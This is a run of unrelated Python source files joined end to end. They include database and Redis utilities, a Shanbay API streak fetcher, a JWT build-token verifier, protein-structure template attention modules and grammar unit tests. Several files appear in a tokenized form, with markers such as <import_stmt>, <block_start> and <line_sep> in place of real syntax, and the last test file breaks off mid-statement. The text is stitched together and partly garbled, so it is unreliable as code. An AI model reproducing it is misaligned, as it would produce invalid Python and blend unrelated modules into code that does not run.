from unittest.mock import patch

from detective.core import get_db_type, stripped_db_url


def test_get_db_type():
    assert get_db_type("mysql://localhost") == "mysql"
    assert get_db_type("mysql+pymysql://localhost") == "mysql"


def test_stripped_db_url():
    assert stripped_db_url("mysql://localhost") == "mysql://localhost"
    assert stripped_db_url("mysql://paulus@localhost") == "mysql://paulus@localhost"
    assert (
        stripped_db_url("mysql://paulus:password@localhost")
        == "mysql://paulus:***@localhost"
    )


def test_fetch_entities(mock_db):
    with patch.object(
        mock_db,
        "perform_query",
        return_value=[["light.kitchen"], ["light.living_room"], ["switch.ac"]],
    ):
        mock_db.fetch_entities()
    assert mock_db.entities == ["light.kitchen", "light.living_room", "switch.ac"]
import torch
import numpy as np
from torchvision import transforms as T
from sklearn.preprocessing import normalize
import os


def load_image(npy_path, input_shape=(630, 80)):
    data = np.load(npy_path)
    if data.shape[0] >= input_shape[0]:
        result = data[:input_shape[0], :]
    else:
        result = np.zeros(input_shape)
        result[:data.shape[0], :data.shape[1]] = data
    image = torch.from_numpy(result).unsqueeze(0).unsqueeze(0)
    return image.float()


def get_feature(model, image):
    data = image.to(torch.device("cuda"))
    with torch.no_grad():
        output = model(data)
    output = output.cpu().detach().numpy()
    output = normalize(output).flatten()
    return np.matrix(output)


def writeFile(fileName, content):
    with open(fileName, 'a') as f1:
        f1.write(content + os.linesep)
import pendulum
import requests

from .config import MY_SHANBAY_USER_NAME, SHANBAY_CALENDAR_API


def _get_shanbay_streak(end_date=pendulum.now("Asia/Shanghai"), streak=0):
    start_date = end_date.start_of("month")
    r = requests.get(
        SHANBAY_CALENDAR_API.format(
            user_name=MY_SHANBAY_USER_NAME,
            start_date=start_date.to_date_string(),
            end_date=end_date.to_date_string(),
        )
    )
    if not r.ok:
        raise Exception("Can not get days from shanbay API")
    data = r.json()
    logs = data["logs"]
    if not logs:
        return streak
    periods = list(pendulum.period(start_date, end_date.subtract(days=1)))
    periods.sort(reverse=True)
    log_dates = [i["date"] for i in logs]
    # if today is done
    if end_date.to_date_string() in log_dates:
        streak += 1
    # for/else: recurse into the previous month only when the loop did not break
    for p in periods:
        if p.to_date_string() not in log_dates:
            break
        streak += 1
    else:
        streak = _get_shanbay_streak(
            start_date.subtract(months=1).end_of("month"), streak=streak
        )
    return streak


def get_shanbay_daily(*args):
    """First get today's status."""
    end_date = pendulum.now("Asia/Shanghai")
    start_date = end_date.start_of("month")
    r = requests.get(
        SHANBAY_CALENDAR_API.format(
            user_name=MY_SHANBAY_USER_NAME,
            start_date=start_date.to_date_string(),
            end_date=end_date.to_date_string(),
        )
    )
    if not r.ok:
        raise Exception("Can not get days from shanbay API")
    data = r.json()
    is_today_check = False
    total_days = data.get("checkin_days_num", 0)
    log_dates = [i["date"] for i in data["logs"]]
    if end_date.to_date_string() in log_dates:
        is_today_check = True
    streak = _get_shanbay_streak()
    return total_days, streak, is_today_check
import numpy


def permute_node(node, permutation_index, axis=-1):
    """Permute index of `node` array

    Args:
        node (numpy.ndarray): the array whose `axis` is to be permuted.
        permutation_index (numpy.ndarray): 1d numpy array whose size should be
            the same as the permutation axis of `node`.
        axis (int): permutation axis.

    Returns (numpy.ndarray): permutated `node` array.
    """
    if node.shape[axis] != len(permutation_index):
        raise ValueError(
            'node.shape[{}] = {} and len(permutation_index) = {} do not match!'
            .format(axis, node.shape[axis], len(permutation_index)))
    out_node = numpy.take(node, permutation_index, axis=axis).copy()
    return out_node


def permute_adj(adj, permutation_index, axis=None):
    """Permute index of adjacency matrix array

    Args:
        adj (numpy.ndarray): the array whose `axis` is to be permuted.
            It is considered as an adjacency matrix.
        permutation_index (numpy.ndarray): 1d numpy array whose size should be
            the same as the permutation axis of `adj`.
        axis (list or tuple or None): list of 2 ints, indicates the permutation
            axes. When None is passed (default), -1 and -2 are used as `axis`,
            meaning the last 2 axes are permuted.

    Returns (numpy.ndarray): permutated `adj` array.
    """
    if axis is not None:
        if not isinstance(axis, (list, tuple)):
            raise TypeError('axis must be list or tuple, got {}'.format(type(axis)))
        if len(axis) != 2:
            raise ValueError('axis length must be 2, got {}'.format(len(axis)))
    else:
        # default value is to use last 2 axes
        axis = [-1, -2]

    num_node = len(permutation_index)
    for ax in axis:
        if adj.shape[ax] != len(permutation_index):
            raise ValueError(
                'adj.shape[{}] = {} and len(permutation_index) = {} do not '
                'match!'.format(ax, adj.shape[ax], len(permutation_index)))

    out_adj = numpy.zeros_like(adj)
    ndim = adj.ndim
    for i in range(num_node):
        for j in range(num_node):
            in_indices = [slice(None)] * ndim
            out_indices = [slice(None)] * ndim
            in_indices[axis[0]] = i
            in_indices[axis[1]] = j
            out_indices[axis[0]] = permutation_index[i]
            out_indices[axis[1]] = permutation_index[j]
            out_adj[tuple(in_indices)] = adj[tuple(out_indices)]
    return out_adj
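# A minimal, hypothetical usage sketch for permute_node / permute_adj above.
# The toy 3-node adjacency matrix and permutation are illustrative assumptions,
# not part of the original module; the functions are assumed to be in scope.
import numpy

toy_adj = numpy.array([[0, 1, 0],
                       [1, 0, 1],
                       [0, 1, 0]])
toy_perm = numpy.array([2, 0, 1])
# Relabels node i as permutation_index[i] on both of the last two axes.
print(permute_adj(toy_adj, toy_perm))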
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版
(BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import time
from contextlib import contextmanager
from uuid import uuid4

from django.conf import settings
from redis.exceptions import LockError

MAX_RETRY = getattr(settings, "REDIS_LOCK_MAX_RETRY", None) or 500


@contextmanager
def redis_lock(redis_instance, key):
    lock_key = "lock_{}".format(key)
    lock_id = str(uuid4())
    try:
        lock_acquired = acquire_redis_lock(redis_instance, lock_key, lock_id)
        err = (
            None
            if lock_acquired
            else LockError(
                f"Unable to acquire redis lock in max tries, lock key: {lock_key}, lock_id: {lock_id}"
            )
        )
        yield lock_acquired, err
    finally:
        release_redis_lock(redis_instance, lock_key, lock_id)


def acquire_redis_lock(redis_instance, lock_key, lock_id):
    cnt = 1
    while cnt < MAX_RETRY:
        if redis_instance.set(lock_key, lock_id, ex=5, nx=True):
            return True
        cnt += 1
        time.sleep(0.01)
    return False


def release_redis_lock(redis_instance, lock_key, lock_id):
    lock_value = redis_instance.get(lock_key)
    # Compatible with redis clients that return either bytes or str
    lock_value = lock_value.decode() if isinstance(lock_value, bytes) else lock_value
    if lock_value == lock_id:
        redis_instance.delete(lock_key)
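# A minimal, hypothetical usage sketch for the redis_lock context manager above.
# The redis.Redis() connection and the "my-task" key are assumptions, not part of
# the original module; it also assumes the module above is importable and Django
# settings plus a reachable Redis server are configured.
import redis

client = redis.Redis()
with redis_lock(client, "my-task") as (acquired, err):
    if not acquired:
        # err holds the LockError built when acquisition failed
        raise err
    # ... critical section protected by the lock ...
    print("doing work while holding the lock")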
def first_method():
    """First sibling package method."""
    return 1


def second_method():
    """Second sibling package method."""
    return 2
import sys

from numba.testing import run_tests

sys.exit(0 if run_tests(sys.argv).wasSuccessful() else 1)
# Generated by Django 3.0.3 on 2020-03-01 19:25

from django.db import migrations
import i18nfield.fields


class Migration(migrations.Migration):

    dependencies = [
        ("submission", "0044_submission_anonymised_data"),
    ]

    operations = [
        migrations.AlterField(
            model_name="question",
            name="help_text",
            field=i18nfield.fields.I18nCharField(blank=True, max_length=800, null=True),
        ),
    ]
class Defaults(object):
    window_size = 7
    hidden_sizes = [300]
    hidden_activation = 'relu'
    max_vocab_size = 1000000
    optimizer = 'sgd'          # 'adam'
    learning_rate = 0.1        # 1e-4
    epochs = 20
    iobes = True               # Map tags to IOBES on input
    max_tokens = None          # Max dataset size in tokens
    encoding = 'utf-8'         # Data encoding
    output_drop_prob = 0.0     # Dropout probability prior to output
    token_level_eval = False   # Force token-level evaluation
    verbosity = 1              # 0=quiet, 1=progress bar, 2=one line per epoch
    fixed_wordvecs = False     # Don't fine-tune word vectors
    word_features = True
    batch_size = 50
    viterbi = True

    # Learning rate multiplier for embeddings. This is a tweak to
    # implement faster learning for embeddings compared to other
    # layers. As the feature is not yet implemented in Keras master
    # (see https://github.com/fchollet/keras/pull/1991), this option
    # currently requires the fork https://github.com/spyysalo/keras .
    embedding_lr_multiplier = 1.0
# coding:utf8
'''
Created on 2013-8-12

@author: lan (www.9miao.com)
'''
import urllib, sys


def execute(*args):
    """ """
    if not args:
        masterport = 9998
    else:
        masterport = int(args[0])
    url = "http://localhost:%s/reloadmodule" % masterport
    try:
        response = urllib.urlopen(url)
    except:
        response = None
    if response:
        sys.stdout.write("reload module success \n")
    else:
        sys.stdout.write("reload module failed \n")
# Copyright 2021 AlQuraishi Laboratory # Copyright 2021 DeepMind Technologies Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_stmt>functools partial<import_stmt>math<import_from_stmt>typing Optional List<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>fastfold.model.nn.primitives Linear LayerNorm Attention<import_from_stmt>fastfold.model.nn.dropout DropoutRowwise DropoutColumnwise <import_from_stmt>fastfold.model.nn.pair_transition PairTransition<import_from_stmt>fastfold.model.nn.triangular_attention TriangleAttentionStartingNode TriangleAttentionEndingNode <import_from_stmt>fastfold.model.nn.triangular_multiplicative_update TriangleMultiplicationOutgoing TriangleMultiplicationIncoming <import_from_stmt>fastfold.utils.checkpointing checkpoint_blocks<import_from_stmt>fastfold.utils.tensor_utils chunk_layer permute_final_dims flatten_final_dims <class_stmt>TemplatePointwiseAttention(nn.Module)<block_start>""" Implements Algorithm 17. """<def_stmt>__init__ self c_t c_z c_hidden no_heads inf **kwargs<block_start>""" Args: c_t: Template embedding channel dimension c_z: Pair embedding channel dimension c_hidden: Hidden channel dimension """<line_sep>super(TemplatePointwiseAttention self).__init__()<line_sep>self.c_t=c_t<line_sep>self.c_z=c_z<line_sep>self.c_hidden=c_hidden<line_sep>self.no_heads=no_heads<line_sep>self.inf=inf<line_sep>self.mha=Attention(self.c_z self.c_t self.c_t self.c_hidden self.no_heads gating=<false> )<block_end><def_stmt>_chunk self z:torch.Tensor t:torch.Tensor biases:List[torch.Tensor] chunk_size:int <arrow>torch.Tensor<block_start>mha_inputs={"q_x":z "kv_x":t "biases":biases }<line_sep><return>chunk_layer(self.mha mha_inputs chunk_size=chunk_size no_batch_dims=len(z.shape[:-2]) )<block_end><def_stmt>forward self t:torch.Tensor z:torch.Tensor template_mask:Optional[torch.Tensor]=<none> chunk_size:Optional[int]=<none><arrow>torch.Tensor<block_start>""" Args: t: [*, N_templ, N_res, N_res, C_t] template embedding z: [*, N_res, N_res, C_t] pair embedding template_mask: [*, N_templ] template mask Returns: [*, N_res, N_res, C_z] pair embedding update """<if_stmt>template_mask<is><none><block_start>template_mask=t.new_ones(t.shape[:-3])<block_end>bias=self.inf<times>(template_mask[<ellipsis> <none> <none> <none> <none> :]-1)<line_sep># [*, N_res, N_res, 1, C_z] z=z.unsqueeze(-2)<line_sep># [*, N_res, N_res, N_temp, C_t] t=permute_final_dims(t (1 2 0 3))<line_sep># [*, N_res, N_res, 1, C_z] biases=[bias]<if_stmt>chunk_size<is><not><none><block_start>z=self._chunk(z t biases chunk_size)<block_end><else_stmt><block_start>z=self.mha(q_x=z kv_x=t biases=biases)<block_end># [*, N_res, N_res, C_z] z=z.squeeze(-2)<line_sep><return>z<block_end><block_end><class_stmt>TemplatePairStackBlock(nn.Module)<block_start><def_stmt>__init__ self c_t:int c_hidden_tri_att:int c_hidden_tri_mul:int no_heads:int pair_transition_n:int dropout_rate:float inf:float **kwargs <block_start>super(TemplatePairStackBlock 
self).__init__()<line_sep>self.c_t=c_t<line_sep>self.c_hidden_tri_att=c_hidden_tri_att<line_sep>self.c_hidden_tri_mul=c_hidden_tri_mul<line_sep>self.no_heads=no_heads<line_sep>self.pair_transition_n=pair_transition_n<line_sep>self.dropout_rate=dropout_rate<line_sep>self.inf=inf<line_sep>self.dropout_row=DropoutRowwise(self.dropout_rate)<line_sep>self.dropout_col=DropoutColumnwise(self.dropout_rate)<line_sep>self.tri_att_start=TriangleAttentionStartingNode(self.c_t self.c_hidden_tri_att self.no_heads inf=inf )<line_sep>self.tri_att_end=TriangleAttentionEndingNode(self.c_t self.c_hidden_tri_att self.no_heads inf=inf )<line_sep>self.tri_mul_out=TriangleMultiplicationOutgoing(self.c_t self.c_hidden_tri_mul )<line_sep>self.tri_mul_in=TriangleMultiplicationIncoming(self.c_t self.c_hidden_tri_mul )<line_sep>self.pair_transition=PairTransition(self.c_t self.pair_transition_n )<block_end><def_stmt>forward self z:torch.Tensor mask:torch.Tensor chunk_size:Optional[int]=<none> _mask_trans:bool=<true><block_start>single_templates=[t.unsqueeze(-4)<for>t torch.unbind(z dim=-4)]<line_sep>single_templates_masks=[m.unsqueeze(-3)<for>m torch.unbind(mask dim=-3)]<for_stmt>i range(len(single_templates))<block_start>single=single_templates[i]<line_sep>single_mask=single_templates_masks[i]<line_sep>single=single+self.dropout_row(self.tri_att_start(single chunk_size=chunk_size mask=single_mask))<line_sep>single=single+self.dropout_col(self.tri_att_end(single chunk_size=chunk_size mask=single_mask))<line_sep>single=single+self.dropout_row(self.tri_mul_out(single mask=single_mask))<line_sep>single=single+self.dropout_row(self.tri_mul_in(single mask=single_mask))<line_sep>single=single+self.pair_transition(single mask=single_mask<if>_mask_trans<else><none> chunk_size=chunk_size )<line_sep>single_templates[i]=single<block_end>z=torch.cat(single_templates dim=-4)<line_sep><return>z<block_end><block_end><class_stmt>TemplatePairStack(nn.Module)<block_start>""" Implements Algorithm 16. """<def_stmt>__init__ self c_t c_hidden_tri_att c_hidden_tri_mul no_blocks no_heads pair_transition_n dropout_rate blocks_per_ckpt inf=1e9 **kwargs <block_start>""" Args: c_t: Template embedding channel dimension c_hidden_tri_att: Per-head hidden dimension for triangular attention c_hidden_tri_att: Hidden dimension for triangular multiplication no_blocks: Number of blocks in the stack pair_transition_n: Scale of pair transition (Alg. 15) hidden dimension dropout_rate: Dropout rate used throughout the stack blocks_per_ckpt: Number of blocks per activation checkpoint. 
None disables activation checkpointing """<line_sep>super(TemplatePairStack self).__init__()<line_sep>self.blocks_per_ckpt=blocks_per_ckpt<line_sep>self.blocks=nn.ModuleList()<for_stmt>_ range(no_blocks)<block_start>block=TemplatePairStackBlock(c_t=c_t c_hidden_tri_att=c_hidden_tri_att c_hidden_tri_mul=c_hidden_tri_mul no_heads=no_heads pair_transition_n=pair_transition_n dropout_rate=dropout_rate inf=inf )<line_sep>self.blocks.append(block)<block_end>self.layer_norm=LayerNorm(c_t)<block_end><def_stmt>forward self t:torch.tensor mask:torch.tensor chunk_size:int _mask_trans:bool=<true> <block_start>""" Args: t: [*, N_templ, N_res, N_res, C_t] template embedding mask: [*, N_templ, N_res, N_res] mask Returns: [*, N_templ, N_res, N_res, C_t] template embedding update """<if_stmt>(mask.shape[-3]<eq>1)<block_start>expand_idx=list(mask.shape)<line_sep>expand_idx[-3]=t.shape[-4]<line_sep>mask=mask.expand(*expand_idx)<block_end>t,=checkpoint_blocks(blocks=[partial(b mask=mask chunk_size=chunk_size _mask_trans=_mask_trans )<for>b self.blocks] args=(t ) blocks_per_ckpt=self.blocks_per_ckpt<if>self.training<else><none> )<line_sep>t=self.layer_norm(t)<line_sep><return>t<block_end><block_end>
import logging

import jsonschema
import jwt

from app import instance_keys
from util.security import jwtutil
from util.security.registry_jwt import (
    generate_bearer_token,
    InvalidBearerTokenException,
    ALGORITHM,
    JWT_CLOCK_SKEW_SECONDS,
)

logger = logging.getLogger(__name__)

ANONYMOUS_SUB = "(anonymous)"
BUILD_JOB_REGISTRATION_TYPE = "build_job_registration"
BUILD_JOB_TOKEN_TYPE = "build_job_token"

BUILD_TOKEN_CONTEXT_SCHEMA = {
    "type": "object",
    "description": "Build context",
    "required": ["token_type", "build_id", "job_id", "expiration"],
    "properties": {
        "token_type": {
            "type": "string",
            "description": "The build token type",
        },
        "build_id": {
            "type": "string",
            "description": "The build id",
        },
        "job_id": {
            "type": "string",
            "description": "The job id",
        },
        "expiration": {
            "type": "number",
            "description": "The number of seconds until the job expires",
        },
    },
}


class InvalidBuildTokenException(Exception):
    pass


def build_token(aud, token_type, build_id, job_id, expiration, instance_keys):
    """Returns an encoded JWT for the given build, signed by the local instance's private key."""
    token_data = {
        "token_type": token_type,
        "build_id": build_id,
        "job_id": job_id,
        "expiration": expiration,
    }

    token = generate_bearer_token(aud, ANONYMOUS_SUB, token_data, {}, expiration, instance_keys)
    return token.decode("utf-8")


def verify_build_token(token, aud, token_type, instance_keys):
    """Verify the JWT build token."""
    try:
        headers = jwt.get_unverified_header(token)
    except jwtutil.InvalidTokenError as ite:
        logger.error("Invalid token reason: %s", ite)
        raise InvalidBuildTokenException(ite)

    kid = headers.get("kid", None)
    if kid is None:
        logger.error("Missing kid header on encoded JWT: %s", token)
        raise InvalidBuildTokenException("Missing kid header")

    public_key = instance_keys.get_service_key_public_key(kid)
    if public_key is None:
        logger.error("Could not find requested service key %s with encoded JWT: %s", kid, token)
        raise InvalidBuildTokenException("Unknown service key")

    try:
        payload = jwtutil.decode(
            token,
            public_key,
            verify=True,
            algorithms=[ALGORITHM],
            audience=aud,
            issuer=instance_keys.service_name,
            leeway=JWT_CLOCK_SKEW_SECONDS,
        )
    except jwtutil.InvalidTokenError as ite:
        logger.error("Invalid token reason: %s", ite)
        raise InvalidBuildTokenException(ite)

    if "sub" not in payload:
        raise InvalidBuildTokenException("Missing sub field in JWT")

    if payload["sub"] != ANONYMOUS_SUB:
        raise InvalidBuildTokenException("Wrong sub field in JWT")

    if (
        "context" not in payload
        or not payload["context"]["token_type"]
        or not payload["context"]["build_id"]
        or not payload["context"]["job_id"]
        or not payload["context"]["expiration"]
    ):
        raise InvalidBuildTokenException("Missing context field in JWT")

    try:
        jsonschema.validate(payload["context"], BUILD_TOKEN_CONTEXT_SCHEMA)
    except jsonschema.ValidationError:
        raise InvalidBuildTokenException(
            "Unable to validate build token context schema: malformed context"
        )

    if payload["context"]["token_type"] != token_type:
        raise InvalidBuildTokenException(
            "Build token type in JWT does not match expected type: %s" % token_type
        )

    return payload
""" Wine Classification Dataset Visualization ========================================== """<line_sep># sphinx_gallery_thumbnail_number = 4 <import_stmt>matplotlib.pyplot<as>plt<import_from_stmt>sklearn.datasets load_wine<import_from_stmt>dabl plot<import_from_stmt>dabl.utils data_df_from_bunch<line_sep>wine_bunch=load_wine()<line_sep>wine_df=data_df_from_bunch(wine_bunch)<line_sep>plot(wine_df 'target')<line_sep>plt.show()<line_sep>
"""CloudWatch Embedded Metric Format utility """<import_from_stmt>.base MetricUnit<import_from_stmt>.exceptions MetricUnitError MetricValueError SchemaValidationError<import_from_stmt>.metric single_metric<import_from_stmt>.metrics Metrics<line_sep>__all__=["Metrics" "single_metric" "MetricUnit" "MetricUnitError" "SchemaValidationError" "MetricValueError" ]<line_sep>
# coding=utf-8 # Copyright 2021 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for arithmetic_grammar."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_stmt>absl.testing parameterized<import_stmt>numpy<as>np<import_from_stmt>six.moves map<import_stmt>tensorflow.compat.v1<as>tf<import_from_stmt>neural_guided_symbolic_regression.utils arithmetic_grammar<class_stmt>ReadGrammarFromFileTest(tf.test.TestCase)<block_start><def_stmt>setUp self<block_start>super(ReadGrammarFromFileTest self).setUp()<line_sep># NLTK grammar use double quotes for production rules. # pylint: disable=g-inconsistent-quotes self.expected_set=set(["S -> S '+' T" "S -> S '-' T" "S -> S '*' T" "S -> S '/' T" "S -> T" "T -> '(' S ')'" "T -> 'x'" "T -> '1'" ])<line_sep># pylint: enable=g-inconsistent-quotes <block_end><def_stmt>test_read_grammar_return_grammar self<block_start>grammar=arithmetic_grammar.read_grammar_from_file('third_party/google_research/google_research/'<concat>'neural_guided_symbolic_regression/grammar/'<concat>'univariate_one_constant_grammar.txt' return_list=<false>)<line_sep>production_rules_set=set(map(str grammar.productions()))<line_sep>self.assertEqual(production_rules_set self.expected_set)<block_end><def_stmt>test_read_grammar_return_list self<block_start>grammar=arithmetic_grammar.read_grammar_from_file('third_party/google_research/google_research/'<concat>'neural_guided_symbolic_regression/grammar/'<concat>'univariate_one_constant_grammar.txt' return_list=<true>)<line_sep>production_rules_set=set(map(str grammar))<line_sep>self.assertEqual(production_rules_set self.expected_set)<block_end><block_end><class_stmt>ArithmeticGrammarTest(parameterized.TestCase tf.test.TestCase)<block_start><def_stmt>test_input_grammar_rules_not_list self<block_start><with_stmt>self.assertRaisesRegex(ValueError 'The input grammar_rules should be list.')<block_start>arithmetic_grammar.Grammar('foo')<block_end><block_end><def_stmt>test_input_grammar_rules_not_unique self<block_start><with_stmt>self.assertRaisesRegex(ValueError 'The grammar production rules are not unique.')<block_start>arithmetic_grammar.Grammar(['foo' 'foo'])<block_end><block_end><def_stmt>test_input_grammar_rules_contain_padding_dummy_production_rule self# If dummy production rule exists in the input grammar rules, it will be # duplicated with the dummy production rule appended in the # arithmetic_grammar. 
<block_start><with_stmt>self.assertRaisesRegex(ValueError 'The grammar production rules are not unique.')<block_start>arithmetic_grammar.Grammar(['foo' 'Nothing -> None'])<block_end><block_end><def_stmt>test_input_grammar_rules_not_change self<block_start>grammar_rules=['S -> T' 'T -> "x"']<line_sep>arithmetic_grammar.Grammar(grammar_rules)<line_sep>self.assertListEqual(grammar_rules ['S -> T' 'T -> "x"'])<block_end><def_stmt>test_basic_production_rules self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules)<line_sep>self.assertLen(grammar.prod_rules 5)<line_sep>self.assertEqual(grammar.num_production_rules 5)<line_sep>self.assertEqual(grammar.padding_rule_index 4)<line_sep>self.assertEqual(grammar.start_index.symbol() 'S')<line_sep>self.assertEqual(str(grammar.start_rule) "S -> S '+' T")<line_sep>self.assertEqual(grammar.unique_lhs ['Nothing' 'S' 'T'])<line_sep>self.assertEqual(grammar.num_unique_lhs 3)<line_sep>np.testing.assert_allclose(grammar.masks [[0. 0. 0. 0. 1.] [1. 1. 0. 0. 0.] [0. 0. 1. 1. 0.]])<line_sep>np.testing.assert_allclose(grammar.prod_rule_index_to_lhs_index [1 1 2 2 0])<line_sep>self.assertEqual(grammar.prod_rule_rhs_indices [[1 2] [2] [1] [] []])<line_sep>self.assertEqual(grammar.max_rhs_indices_size 2)<block_end><def_stmt>test_basic_production_rules_add_unique_production_rule_to_start self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules add_unique_production_rule_to_start=<true>)<line_sep>self.assertLen(grammar.prod_rules 6)<line_sep>self.assertEqual(grammar.num_production_rules 6)<line_sep>self.assertEqual(grammar.padding_rule_index 5)<line_sep>self.assertEqual(grammar.start_index.symbol() 'O')<line_sep>self.assertEqual(str(grammar.start_rule) 'O -> S')<line_sep>self.assertEqual(grammar.unique_lhs ['Nothing' 'O' 'S' 'T'])<line_sep>self.assertEqual(grammar.num_unique_lhs 4)<line_sep>np.testing.assert_allclose(grammar.masks [[0. 0. 0. 0. 0. 1.] [1. 0. 0. 0. 0. 0.] [0. 1. 1. 0. 0. 0.] [0. 0. 0. 1. 1. 0.]])<line_sep>np.testing.assert_allclose(grammar.prod_rule_index_to_lhs_index [1 2 2 3 3 0])<line_sep>self.assertEqual(grammar.prod_rule_rhs_indices [[2] [2 3] [3] [2] [] []])<line_sep>self.assertEqual(grammar.max_rhs_indices_size 2)<block_end><def_stmt>test_basic_production_rules_padding_at_end_false self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules padding_at_end=<false>)<line_sep>self.assertLen(grammar.prod_rules 5)<line_sep>self.assertEqual(grammar.num_production_rules 5)<line_sep>self.assertEqual(grammar.padding_rule_index 0)<line_sep>self.assertEqual(grammar.start_index.symbol() 'S')<line_sep>self.assertEqual(str(grammar.start_rule) "S -> S '+' T")<line_sep>self.assertEqual(grammar.unique_lhs ['Nothing' 'S' 'T'])<line_sep>self.assertEqual(grammar.num_unique_lhs 3)<line_sep>np.testing.assert_allclose(grammar.masks [[1. 0. 0. 0. 0.] [0. 1. 1. 0. 0.] [0. 0. 0. 1. 
1.]])<line_sep>np.testing.assert_allclose(grammar.prod_rule_index_to_lhs_index [0 1 1 2 2])<line_sep>self.assertEqual(grammar.prod_rule_rhs_indices [[] [1 2] [2] [1] []])<line_sep>self.assertEqual(grammar.max_rhs_indices_size 2)<block_end>@parameterized.parameters([(<true> <true> "\t0: S -> T\n\t1: T -> 'x'\n\t2: Nothing -> None\n") (<true> <false> "0: S -> T\n1: T -> 'x'\n2: Nothing -> None\n") (<false> <true> "\t0: Nothing -> None\n\t1: S -> T\n\t2: T -> 'x'\n") (<false> <false> "0: Nothing -> None\n1: S -> T\n2: T -> 'x'\n") ])<def_stmt>test_grammar_to_string self padding_at_end indent expected_string<block_start>grammar_rules=['S -> T' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules padding_at_end=padding_at_end)<line_sep>self.assertEqual(grammar.grammar_to_string(indent=indent) expected_string)<block_end><def_stmt>test_invalid_grammar_string_no_space_before_arrow self<block_start><with_stmt>self.assertRaisesRegex(ValueError 'Unable to parse')# No space between arrow and left hand side symbol. <block_start>arithmetic_grammar.Grammar(['a-> b'])<block_end><block_end><def_stmt>test_invalid_grammar_string_no_space_after_arrow self# No space between arrow and right hand side symbol. # This is a valid input and should not raise error. <block_start>arithmetic_grammar.Grammar(['a ->b'])<block_end><def_stmt>test_invalid_grammar_string_no_arrow self<block_start><with_stmt>self.assertRaisesRegex(ValueError 'Unable to parse')# Invalid input with no arrow. <block_start>arithmetic_grammar.Grammar(['a b'])<block_end><block_end><def_stmt>test_invalid_grammar_string_two_left_hand_side_symbols self<block_start><with_stmt>self.assertRaisesRegex(ValueError 'Unable to parse')# Invalid input with more than one left hand side symbol. <block_start>arithmetic_grammar.Grammar(['a b -> c'])<block_end><block_end><def_stmt>test_invalid_grammar_string_no_left_hand_side_symbol self<block_start><with_stmt>self.assertRaisesRegex(ValueError 'Unable to parse')# Invalid input with no left hand side symbol. <block_start>arithmetic_grammar.Grammar([' -> c'])<block_end><block_end><def_stmt>test_invalid_grammar_string_empty_right_hand_side_symbol self# No right hand side symbol. # This is a valid input and should not raise error. <block_start>arithmetic_grammar.Grammar(['a -> '])<block_end><def_stmt>test_parse_expressions_to_indices_sequences_input_not_list self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules)<with_stmt>self.assertRaisesRegex(ValueError 'expression_strings is expected to be list, but got')<block_start>grammar.parse_expressions_to_indices_sequences(# Note the input expression_strings is a string not a list of strings. 
expression_strings='x + ( x )' max_length=8)<block_end><block_end><def_stmt>test_parse_expressions_to_indices_sequences_short_max_length self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules)<with_stmt>self.assertRaisesRegex(ValueError r'The number of production rules to parse expression .* '<concat>'can not be greater than max_length')<block_start>grammar.parse_expressions_to_indices_sequences(expression_strings=['x + ( x )'] max_length=2)<block_end><block_end><def_stmt>test_parse_expressions_to_indices_sequences_invalid_expression_string self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules)<with_stmt>self.assertRaisesRegex(ValueError 'cannot be parsed to production rules')<block_start>grammar.parse_expressions_to_indices_sequences(expression_strings=['x x'] max_length=8)<block_end><block_end><def_stmt>test_grammar_with_callables self<block_start>grammar_rules=['S -> S "+" S' # index 0 'S -> S "-" S' # index 1 'S -> "FUNCTION1(" P ")"' # index 2 'P -> T' # index 3 'P -> "1" "+" T' # index 4 'S -> T' # index 5 'T -> "FUNCTION2(" "x" "," "c" ")"' # index 6 ]<line_sep># padding rule index 7 grammar=arithmetic_grammar.Grammar(grammar_rules)<line_sep>indices_sequences=grammar.parse_expressions_to_indices_sequences(expression_strings=['FUNCTION1( FUNCTION2( x , c ) ) - '<concat>'FUNCTION2( x , c ) + FUNCTION2( x , c )'] max_length=10)<line_sep>np.testing.assert_equal(indices_sequences [# Preorder traversal of parsing tree. # S # | # S '+' S # | | # S '-' S T # | | | # 'FUNCTION1(' P ')' T 'FUNCTION2( x , c )' # | | # T 'FUNCTION2( x , c )' 